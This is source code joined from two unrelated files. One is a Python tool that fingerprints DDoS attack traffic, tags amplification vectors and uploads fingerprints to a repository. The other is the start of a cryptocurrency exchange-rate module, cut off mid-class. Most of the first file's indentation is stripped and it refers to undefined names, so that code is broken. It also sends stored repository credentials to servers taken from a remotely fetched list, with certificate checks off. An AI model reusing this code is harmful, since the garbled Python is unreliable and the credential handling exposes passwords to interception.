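    # prints: "TRAFFIC MATCHED  | [<16 filled blocks><24 dashes>] 40%"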
#------------------------------------------------------------------------------
def evaluate_fingerprint(df,df_fingerprint,fingerprints):
"""
    :param df: dataframe itself
    :param df_fingerprint: dataframe filtered based on matched fingerprint
    :param fingerprints: json file with the generated fingerprints
    :return accuracy_ratio: the percentage of the full dataframe matched by the generated fingerprint
"""
total_rows_matched = len(df_fingerprint)
msg = "Fingerprint evaluation"
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.info("TRAFFIC MATCHED: {0}%. The generated fingerprint will filter {0}% of the analysed traffic".format(round(len(df_fingerprint)*100/len(df))))
percentage_of_ips_matched = len(df_fingerprint['ip_src'].unique().tolist() )*100/len(df.ip_src.unique().tolist())
logger.info("IPS MATCHED : {0}%. The generated fingerprint will filter {0}% of SRC_IPs".format(round(percentage_of_ips_matched)))
if not (args.quiet):
value = round(len(df_fingerprint)*100/len(df))
printProgressBar(value,"TRAFFIC MATCHED")
printProgressBar(round(percentage_of_ips_matched),"IPs MATCHED")
#
# Fields breakdown
#
if (args.verbose) or (args.debug):
count = 0
try:
df.fragmentation = df.fragmentation.astype(str)
        except Exception:
            pass
# for each fingerprint generated
for fingerprint in (fingerprints['attack_vector']):
count = count + 1
results = {}
for key, value in fingerprint.items():
if key in ["src_ips","attack_vector_key","one_line_fingerprint"]:
continue
val = ','.join(str(v) for v in value)
val = val.split()
total_rows_matched = len(df[df[key].isin(val)])
percentage = round(total_rows_matched*100/len(df))
# dict with all the fields and results
results.update( {key: percentage} )
results_sorted = {k: v for k, v in sorted(results.items(), key=lambda item: item[1], reverse=True)}
logger.info(" ============= FIELDS BREAKDOWN === ATTACK_VECTOR {} ============= ".format(count))
for label, percentage in results_sorted.items():
printProgressBar(percentage,label,"▭ ")
return ()
#------------------------------------------------------------------------------
def check_repository(config):
"""
Check repository access and credentials
    :param config: parsed configuration (ConfigParser object)
"""
logger.info("Checking repository")
url = "https://raw.githubusercontent.com/ddos-clearing-house/ddos_dissector/2.0/repository.txt"
response = requests.get(url)
servers = response.content.decode("utf-8").split()
login = ""
table_column = 3
row_format ="{:>22}" * (table_column)
print(row_format.format("\nServer", "Status", "Credentials"))
print ("--"*25)
for server in servers:
try:
code = requests.get(server, timeout=2).status_code
except:
code = "OFFLINE"
if (code ==200):
code = "ONLINE"
# check credentials
headers = {
"X-Username": config['repository']['user'],
"X-Password": config['repository']['passwd'],
}
server_config = re.search('https?://(.*)/?', server).group(1)
# check if the configuration file has credentials for the online server
if (server_config in config.sections()):
if (config[server_config]):
headers = {
"X-Username": config[server_config]['user'],
"X-Password": config[server_config]['passwd'],
}
else:
logger.info("Credentials from {} is not available in the configuration file [ddosdb.conf]")
login = "NOT_OK"
try:
r = requests.get(server+"/my-permissions", headers=headers,verify=False)
except requests.exceptions.RequestException as e:
logger.critical("Cannot connect to the server to check credentials")
logger.debug("{}".format(e))
print (e)
if (r.status_code==403):
print ("Invalid credentials or no permission to upload fingerprints:")
login = "NOT_OK"
elif (r.status_code==200):
login = "SUCCESS"
row_format ="{:>15}" * (table_column)
print(row_format.format(server, code, login))
sys.exit(0)
#------------------------------------------------------------------------------
def get_matching_ratio(df_attack_vector,fingerprint):
"""
Get matching ratio for each fingerprint found
    :param df_attack_vector: dataframe related to the fingerprint
    :param fingerprint: dictionary with matched fields
    :return: dict with the matching ratio and the fingerprint
"""
if not fingerprint:
return (NONE,NONE)
df_fingerprint = df_attack_vector
for key, value in fingerprint.items():
# ignore metadata field
if key not in df_fingerprint.columns:
continue
df_fingerprint = df_fingerprint[df_fingerprint[key].isin(value)]
# evaluate fingerprint matching ratio
accuracy_ratio = round(len(df_fingerprint)*100/len(df_attack_vector))
d = { "ratio" : accuracy_ratio,
"fingerprint" : fingerprint
}
return (df_fingerprint,d)
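# Toy example (illustrative only, never called) of how get_matching_ratio() filters: each
# fingerprint field is applied with isin(), and the ratio is the share of rows that survive
# every filter.
def _example_matching_ratio():
    toy = pd.DataFrame({"srcport": [53, 53, 80, 53], "ip_proto": ["UDP", "UDP", "TCP", "UDP"]})
    df_match, info = get_matching_ratio(toy, {"srcport": [53], "ip_proto": ["UDP"]})
    # three of the four rows match both fields -> info == {"ratio": 75, "fingerprint": {...}}
    return df_match, info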
#------------------------------------------------------------------------------
def single_vector_heuristic(df_attack_vector,n_type):
fields = df_attack_vector.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
logger.debug("ATTACK TYPE 1: GENERIC ")
fingerprint = {}
for field in fields:
outlier = find_outlier(df_attack_vector[field],df_attack_vector,n_type)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
return (fingerprint)
#------------------------------------------------------------------------------
def build_attack_fingerprint(df,df_attack_vector,n_type,multi_vector_attack_flag):
"""
    Build the fingerprint for one attack vector by applying the heuristics below and keeping the best match
    :param df: dataframe itself
    :param df_attack_vector: dataframe filtered by target IP and attack protocol
:param n_type: network file type (flows,pcap)
:param multi_vector_attack_flag: attack composed by multiple protocols
:return fingerprints: json file
"""
# remove target IP from dataframe since it will be anonymized
del df_attack_vector['ip_dst']
attack_vector_protocol = df_attack_vector['highest_protocol'].iloc[0]
logger.info("Processing attack_vector based on {}".format(attack_vector_protocol))
# DETECTION RATE HEURISTIC
dic_ratio_array = []
### FIRST HEURISTIC
fingerprint = single_vector_heuristic(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
logger.debug(dict_accuracy_ratio)
if (dict_accuracy_ratio != NONE):
logger.debug('-' * 60)
logger.info("HEURISTIC 1: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("First heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("First heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("First fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 1: matching ratio 0%")
### SECOND HEURISTIC
fingerprint = multifragmentation_heuristic(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
logger.debug(dict_accuracy_ratio)
if (dict_accuracy_ratio != NONE):
logger.debug('-' * 60)
logger.info("HEURISTIC 2: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("Second heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("Second heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("Second fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 2: matching ratio 0%")
### THIRD HEURISTIC
fingerprint = multi_attack_vector_heuristic(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
if (dict_accuracy_ratio != NONE):
logger.info("HEURISTIC 3: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("Third heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("Third heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("Third fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 3: matching ratio 0%")
# pick the best matching rate
df_ = pd.DataFrame(dic_ratio_array)
logger.debug("Fingerprint found")
logger.debug(df_)
data = df_.sort_values(by="size",ascending=True)
# filter fingerprint with more than 2 fields
data = data[data['size'] > 2]
data["diff"] = data.ratio.diff().fillna(0).astype(int)
    # Prefer the longest fingerprint (it is more specific),
    # as long as its detection ratio is at most 10 points lower than the alternative
fingerprint = data[data['diff']>-10].sort_values(by="size",ascending=False).head(1)['fingerprint'].values[0]
    # no longer fingerprint qualified, fall back to the one with the best ratio
if not fingerprint:
fingerprint = df_.sort_values(by="ratio",ascending=False).loc[0,"fingerprint"]
print (df_.sort_values(by="ratio",ascending=False).loc[0,"ratio"])
return (fingerprint)
#------------------------------------------------------------------------------
def bar(row):
"""
Plot ASCII bar
:param row: line to be printed
"""
percent = int(row['percent'])
bar_chunks, remainder = divmod(int(percent * 8 / increment), 8)
count = str(row['counts'])
label = row['index']
percent = str(percent)
bar = '█' * bar_chunks
if remainder > 0:
bar += chr(ord('█') + (8 - remainder))
# If the bar is empty, add a left one-eighth block
bar = bar or '▏'
print ("{} | {} - {}% {}".format( label.rjust(longest_label_length), count.rjust(longest_count_length),percent.rjust(3), bar ))
return ()
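# Illustrative sketch (never called) of the eighth-block arithmetic used in bar() above:
# a percentage is split into full blocks plus one partial block taken from the
# U+2588 (full) .. U+258F (one eighth) range. `increment` is a module-level scaling factor
# set by the caller of bar(); it is taken to be 1 here for simplicity.
def _example_partial_blocks(percent, increment=1):
    bar_chunks, remainder = divmod(int(percent * 8 / increment), 8)
    partial = chr(ord('█') + (8 - remainder)) if remainder else ''
    return '█' * bar_chunks + partial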
#------------------------------------------------------------------------------
def add_label(fingerprints,df):
"""
Add labels to fingerprint generated
"""
# UDP Service Mapping
udp_service = {
25: 'SMTP',
123: 'NTP',
        11211: 'Memcached',
1194: 'OpenVPN',
1434: 'SQL server',
1718: 'H323',
1900: 'SSDP',
3074: 'Game Server',
3283: 'Apple Remote Desktop',
3702: 'WSD - Web Services Discovery',
5683: 'CoAP',
20800: 'Game Server',
27015: 'Game Server',
30718: 'IoT Lantronix',
33848: 'Jenkins Server',
37810: 'DVR DHCPDiscover',
47808: 'BACnet',
}
generic_amplification_ports = [53, 389, 123, 161, 672]
label = []
for fingerprint in fingerprints:
if (len(fingerprints)>1):
label.append("MULTI_VECTOR_ATTACK")
else:
label.append("SINGLE_VECTOR_ATTACK")
# add protocol name to label list
if 'highest_protocol' in fingerprint:
label.append(", ".join(fingerprint['highest_protocol']))
if 'dns_qry_name' in fingerprint:
label.append("DNS_QUERY")
if 'udp_length' in fingerprint:
# Based on FBI Flash Report MU-000132-DD
df_length = (df.groupby(['srcport'])['udp_length'].max()).reset_index()
            if (df_length.udp_length > 468).any():
label.append("UDP_SUSPECT_LENGTH")
for port in udp_service:
if ("srcport" in fingerprint):
if (fingerprint['srcport'] == [port]):
label.append("AMPLIFICATION")
label.append("RDDoS")
label.append(udp_service[port])
# Frag attack
if 'fragmentation' in fingerprint:
value = fingerprint.get('fragmentation')[0]
if (value==True):
label.append("FRAGMENTATION")
# Generic amplification attack
if ("srcport" in fingerprint):
if (len(fingerprint['srcport']) > 1):
label.append("MULTIPROTOCOL")
for port in generic_amplification_ports:
if (port in list(fingerprint['srcport'])):
label.append("AMPLIFICATION")
continue
return (list(set(label)))
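# Illustrative sketch (never called): the kind of tag list add_label() derives for a single
# hypothetical DNS amplification fingerprint (srcport 53, no fragmentation).
def _example_add_label():
    toy_fingerprints = [{"highest_protocol": ["DNS"], "srcport": [53], "fragmentation": [False]}]
    toy_df = pd.DataFrame({"srcport": [53], "udp_length": [120]})
    return add_label(toy_fingerprints, toy_df)
    # expected tags: SINGLE_VECTOR_ATTACK, DNS and AMPLIFICATION (53 is a generic amplification port)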
#------------------------------------------------------------------------------
def logo():
print ('''
_____ _____ _____ _____ ____
| __ \| __ \ / ____| __ \| _ \
| | | | | | | ___| (___ | | | | |_) |
| | | | | | |/ _ \\ ___ \| | | | _ <
| |__| | |__| | (_) |___) | |__| | |_) |
|_____/|_____/ \___/_____/|_____/|____/
''')
#------------------------------------------------------------------------------
def import_logfile(args):
"""
Load configuration file to structured format
:param args: command line parameters
:return config: structured format
"""
if (args.config):
if os.path.isfile(args.config) and os.access(args.config, os.R_OK):
msg = "Using configuration file [{}]".format(args.config)
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.debug("Configuration found: {}".format(args.config))
config = configparser.ConfigParser()
config.read(args.config)
return (config)
else:
print ("Configuration file provided [{}] not found ".format(args.config))
return None
#------------------------------------------------------------------------------
def prepare_fingerprint_upload(df_fingerprint,df,fingerprints,n_type,labels,fingerprint_dir):
"""
    Add additional fields and stats to the generated fingerprint
    :param df_fingerprint: dataframe filtered based on matched fingerprint
    :param df: dataframe itself
    :param fingerprints: list of per-attack-vector fingerprints (json)
:param n_type: network file type (flows,pcap)
:return json file
"""
fingerprint_combined = {}
fingerprint_array = []
# add one_line_fingerprint (summary) to each attack_vector fingerprint
for attack_vector in fingerprints:
attack_vector_anon = copy.deepcopy(attack_vector)
attack_vector_anon.update({"src_ips": "omitted"})
del attack_vector_anon['attack_vector_key']
one_line_fingerprint = str(attack_vector_anon).translate(str.maketrans("", "", "[]"))
attack_vector.update({"one_line_fingerprint": one_line_fingerprint })
fingerprint_array.append(attack_vector)
# fingerprints
fingerprint_combined.update({"attack_vector": fingerprint_array})
# timestamp fields
initial_timestamp = df_fingerprint['frame_time_epoch'].min()
initial_timestamp = datetime.utcfromtimestamp(initial_timestamp).strftime('%Y-%m-%d %H:%M:%S')
fingerprint_combined.update( {"start_time": initial_timestamp} )
duration_sec = df_fingerprint['frame_time_epoch'].max() - df_fingerprint['frame_time_epoch'].min()
    duration_sec = '{:.2f}'.format(duration_sec)
fingerprint_combined.update( {"duration_sec": float(duration_sec)} )
fingerprint_combined.update( {"total_dst_ports": len(df_fingerprint['dstport'].unique().tolist())} )
if (n_type == FLOW_TYPE):
# FIXME - should consider the sample rate
fingerprint_combined.update( {"avg_bps": int(df_fingerprint.in_packets.mean())})
fingerprint_combined.update( {"total_packets": int(df_fingerprint.in_packets.sum())})
else:
duration_sec = float(duration_sec)
fingerprint_combined.update( {"avg_bps": int(df_fingerprint.frame_len.sum()/duration_sec) })
fingerprint_combined.update( {"total_packets": len(df_fingerprint)} )
# keys used on the repository
    sha256 = hashlib.sha256(str(fingerprints).encode()).hexdigest()
fingerprint_combined.update( {"ddos_attack_key": sha256} )
fingerprint_combined.update( {"key": sha256[:15]} )
fingerprint_combined.update( {"total_ips": len(df_fingerprint['ip_src'].unique().tolist()) })
if (n_type == 0):
n_type = "FLOW"
else:
n_type = "PCAP"
fingerprint_combined.update( {"file_type": n_type})
fingerprint_combined.update( {"tags": labels})
# save fingerprint to local file in order to enable the upload via POST
if not os.path.exists(fingerprint_dir):
os.makedirs(fingerprint_dir)
json_file = "{}/{}.json".format(fingerprint_dir,sha256[:32])
try:
with open(json_file, 'w') as f_fingerprint:
json.dump(fingerprint_combined, f_fingerprint)
files = {
"json": open(json_file, "rb"),
# ignoring pcap file upload for now
"pcap": open(json_file, "rb"),
}
except:
logger.info("Could not save fingerprint {}".format(json_file))
return (fingerprint_combined,json_file)
#------------------------------------------------------------------------------
def print_fingerprint(fingerprint):
"""
Print a summarized version of the fingerprint generated using
the highlight module.
"""
# anon src_ips
attack_vectors_array = fingerprint["attack_vector"]
anon_attack_vector = []
for vector in attack_vectors_array:
vector.update({"src_ips": "ommited"})
anon_attack_vector.append(vector)
fingerprint["attack_vector"] = anon_attack_vector
fingerprint.update({"tags": labels})
json_str = json.dumps(fingerprint, indent=4, sort_keys=True)
msg = "Generated fingerprint"
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
print(highlight(json_str, JsonLexer(), TerminalFormatter()))
#------------------------------------------------------------------------------
def evaluate_fingerprint_ratio(df,fingerprints,fragmentation_attack_flag):
"""
Get the fingerprint and get matching ratio using the input file
param: df input file
param: fragmentation_attack_flag fragmentation flag (network
layer) used to cluster data without layer 7 info.
"""
if (len(fingerprints)==0):
print ("Could not find a fingerprint for this network file :(" )
sys.exit()
if (len(fingerprints)==1):
# only one fingerprint was found
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprints[0])
if fragmentation_attack_flag:
logger.debug("multivector attack with fragmentation - one fingerprint")
logger.debug("1 fingerprint found, but it was expected more than 1, since it is a fragmentation attack")
# add fragmentation dataframe because a fragmentation attack was detected
df_frag = df[df['highest_protocol'].str.contains('IPv[46]')]
            # add the fragmentation IPs to the evaluation dataframe
df_all = pd.concat([df_frag,df_fingerprint])
return (df_all)
# No fragmentation
else:
logger.debug("multivector attack with NO fragmentation - one fingerprint")
return (df_fingerprint)
# more than 1 fingerprint was found
else:
# more than 1 fingerprint and they are related to fragmentation attack
df_attack_vector_combined = pd.DataFrame()
# get dataframe per fingerprint and combine it
for attack_vector_fingerprint in fingerprints:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,attack_vector_fingerprint)
df_attack_vector_combined = pd.concat([df_attack_vector_combined,df_fingerprint])
# add fragmentation dataframe to the filtered one
if fragmentation_attack_flag:
logger.debug("multivector attack with fragmentation - 1+ fingerprints")
df_frag = df[df['highest_protocol'].str.contains('IPv[46]')]
df_attack_vector_combined = pd.concat([df_frag,df_attack_vector_combined])
# more than 1 fingerprint and they are NOT related to fragmentation attack
else:
logger.debug("multivector attack with NO fragmentation - 1+ fingerprints")
return (df_attack_vector_combined)
###############################################################################
### Main Process
if __name__ == '__main__':
logo()
signal.signal(signal.SIGINT, signal_handler)
parser = parser_add_arguments()
args = parser.parse_args()
logger = logger(args)
config = import_logfile(args)
if (args.version):
print ("version: {}".format(version))
sys.exit(0)
if (args.status):
check_repository(config)
df = pd.DataFrame()
for filename in args.filename:
if (not filename):
parser.print_help()
sys.exit(IOError("\nInput file not provided. Use '-f' for that."))
if (not os.path.exists(filename)):
logger.error(IOError("File " + filename + " is not readble"))
sys.exit(IOError("File " + filename + " is not readble"))
# load network file
n_type,df_ = load_file(args,filename)
df = pd.concat([df_, df],sort=False)
if not isinstance(df, pd.DataFrame):
logger.error("could not convert input file <{}>".format(args.filename))
sys.exit(1)
# checking if the provided file could be converted to dataframe
if (len(df)<2):
logger.error("could not read data from file <{}>".format(args.filename))
sys.exit(1)
##
## DETECT TARGET
##
    # usually there is only one target, but anycast/load-balanced setups may have more
(target_ip_list,df) = infer_target_ip(df,n_type)
try:
target_ip = target_ip_list[0]
except:
print ("Target IP could not be infered.")
sys.exit(0)
# build filter for victim IP
msg = "Processing target IP address: {}".format(target_ip)
df_target = df[df['ip_dst'] == target_ip]
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.debug(msg)
##
## IDENTIFY ATTACK VECTORS (PROTOCOL)
##
(lst_attack_protocols, fragmentation_attack_flag) = infer_protocol_attack(df_target,n_type)
multi_vector_attack_flag = False
# more than one protocol as outliers
if (len(lst_attack_protocols)>1):
multi_vector_attack_flag = True
logger.info("Multi-vector attack based on: {} : fragmentation [{}]".format(lst_attack_protocols,fragmentation_attack_flag))
else:
logger.info("Single attack based on: {} : fragmentation [{}]".format(lst_attack_protocols,fragmentation_attack_flag))
##
## IDENTIFY FINGERPRINTS
##
fingerprints = []
# fingerprint per attack vector
for protocol in lst_attack_protocols:
# filter database based on protocol and target
df_attack_vector = df[(df['ip_dst'] == target_ip) & (df['highest_protocol'] == protocol)]
fingerprint = build_attack_fingerprint(df,df_attack_vector,n_type,multi_vector_attack_flag)
# get src_ips per attack vector
src_ips = []
src_ips.append(fingerprint)
df_src_ips = evaluate_fingerprint_ratio(df,src_ips,fragmentation_attack_flag)
fingerprint.update( {"src_ips": df_src_ips['ip_src'].unique().tolist()})
# generate key for this attack vector
sha256 = hashlib.sha256(str(fingerprint).encode()).hexdigest()
fingerprint.update( {"attack_vector_key": sha256} )
fingerprints.append(fingerprint)
##
## FINGERPRINT EVALUATION
##
df_filtered = evaluate_fingerprint_ratio(df,fingerprints,fragmentation_attack_flag)
# infer tags based on the generated fingerprint
labels = add_label(fingerprints,df_filtered)
# add extra fields/stats and save file locally
(enriched_fingerprint,json_file) = prepare_fingerprint_upload(df_filtered,df,fingerprints,n_type,labels,args.fingerprint_dir)
# show summarized fingerprint
print_fingerprint(enriched_fingerprint)
# print matching ratio
if (args.summary): evaluate_fingerprint(df,df_filtered,enriched_fingerprint)
# generate graphic file (dot)
    if (args.graph): generate_dot_file(df_filtered, df)
print ("Fingerprint saved on {}".format(json_file))
if (args.upload):
(user,passw,host) = get_repository(args,config)
# upload to the repository
ret = upload(enriched_fingerprint, json_file, user, passw, host, enriched_fingerprint.get("key"))
sys.exit(0)
#EOF
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitbank(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('public.bitbank.cc', '/btc_jpy/ticker')
return {'JPY': Decimal(json['data']['last'])}
class BitFlyer(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitflyer.jp', '/api/echo/price')
return {'JPY': Decimal(json['mid'])}
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('btc_to_')])
class CoinDesk(ExchangeBase):
def get_currencies(self):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
return [d['currency'] for d in dicts]
def get_rates(self, ccy):
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
result = {ccy: Decimal(json['bpi'][ccy]['rate_float'])}
return result
def history_starts(self):
return { 'USD': '2012-11-30', 'EUR': '2013-09-01' }
def history_ccys(self):
return self.history_starts().keys()
def request_history(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
pairs = ['XBT%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
def history_ccys(self):
return ['BRL']
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', 'trade?buy')
return {'INR': Decimal(json)}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
